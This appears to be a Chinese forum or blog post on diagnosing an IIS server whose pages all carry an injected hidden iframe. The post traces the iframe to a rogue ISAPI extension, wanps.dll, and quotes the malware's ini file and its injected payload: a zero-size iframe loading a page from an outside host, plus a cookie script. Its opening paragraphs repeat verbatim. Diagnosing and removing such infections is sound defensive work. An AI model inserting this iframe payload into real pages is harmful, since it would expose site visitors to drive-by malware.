一台服务器 几乎所有网站打开网页 甚至HTML网页 都出现了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 一般在头部 部分杀毒软件打开会报毒
打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码
起初会怀疑是JS 找了半天还是没有发现 连新建的HTML页面 也会有这段代码~
仔细寻找 问题应该在IIS上 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的
路径为:c:\windows\help\wanps.dll ISAP加载正常 绿色状态
取消 重新启动IIS 所有代码消失
加载项包含了三个文件:
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
这种样式的代码 一般在头部 部分杀毒软件打开会报毒
打开HTML或ASP PHP页面 在源码中怎么也找不到这段代码
起初会怀疑是JS 找了半天还是没有发现 连新建的HTML页面 也会有这段代码~
仔细寻找 问题应该在IIS上 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的
路径为:c:\windows\help\wanps.dll ISAP加载正常 绿色状态
取消 重新启动IIS 所有代码消失
加载项包含了三个文件:
wanps.ini内容为:
Cookie=GAG5=ABCDEFG
Redirector=C:\windows\help\wanps.txt
wanps.txt内容为:
<body>
<iframe src="http://web.cn3721.org/web.htm" height=0 width=0></iframe>
<script language="javascript">
<!--
var expires = new Date();
expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);
document.cookie="GAG5=ABCDEFG;expires="+expires.toGMTString();
-->
</script>
</body>
没有绝对安全的服务器 但是我们可以及时和努力的去修复漏洞。
